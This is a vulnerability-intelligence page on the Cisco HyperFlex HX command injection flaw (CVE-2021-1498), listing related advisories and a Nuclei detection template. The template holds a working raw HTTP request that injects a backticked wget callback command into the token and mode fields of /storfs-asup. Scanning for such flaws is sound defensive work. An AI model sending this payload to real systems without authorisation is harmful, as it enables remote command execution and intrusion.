Cisco HyperFlex HX Data Platform - Remote Command Execution. Multiple vulnerabilities in web-based management interface could allow unauthenticated remote attacker to perform command injection attacks and execute arbitrary commands on affected system. Apply necessary security patches or updates provided by Cisco to mitigate this vulnerability
Reporter | Title | Published | Views | Family All 35 |
---|---|---|---|---|
seebug.org | Cisco HyperFlex HX 未授权命令注入漏洞(CVE-2021-1497 CVE-2021-1498) | 20 May 202100:00 | – | seebug |
Metasploit | Cisco HyperFlex HX Data Platform Command Execution | 3 Jun 202105:43 | – | metasploit |
Cisco | Cisco HyperFlex HX Command Injection Vulnerabilities | 5 May 202116:00 | – | cisco |
Rapid7 Blog | Metasploit Wrap-Up | 11 Jun 202119:51 | – | rapid7blog |
Check Point Advisories | Cisco HyperFlex HX Command Injection (CVE-2021-1498; CVE-2021-1497) | 20 Jun 202100:00 | – | checkpoint_advisories |
Check Point Advisories | Cisco HyperFlex HX Command Injection (CVE-2021-1497) | 16 Jun 202200:00 | – | checkpoint_advisories |
Nuclei | Cisco HyperFlex HX Data Platform - Remote Command Execution | 6 Jul 202100:30 | – | nuclei |
Packet Storm | Cisco HyperFlex HX Data Platform Command Execution | 4 Jun 202100:00 | – | packetstorm |
0day.today | Cisco HyperFlex HX Data Platform Command Execution Exploit | 4 Jun 202100:00 | – | zdt |
Tenable Nessus | Cisco HyperFlex HX Command Injection Vulnerabilities (cisco-sa-hyperflex-rce-TjjNrkpR) | 13 May 202100:00 | – | nessus |
id: CVE-2021-1498
info:
name: Cisco HyperFlex HX Data Platform - Remote Command Execution
author: gy741
severity: critical
description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
remediation: |
Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.
reference:
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
- https://nvd.nist.gov/vuln/detail/CVE-2021-1498
- https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html
- https://twitter.com/Unit42_Intel/status/1402655493735206915
- https://twitter.com/ptswarm/status/1390300625129201664
- https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-1498
cwe-id: CWE-78
epss-score: 0.97528
epss-percentile: 0.99991
cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cisco
product: hyperflex_hx_data_platform
tags: cve,cve2021,kev,packetstorm,cisco,rce,oast,mirai
http:
- raw:
- |
POST /storfs-asup HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200
# digest: 4b0a00483046022100fcaa8f76082398c8c64e4cbc2ac0d15c7d49cdfa546c4b7ab8209bbe58ff6e8f022100e243eb8a0f713daf34ef381c81384329ae93e773c488dc6b2e413bf1ce6ae17b:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo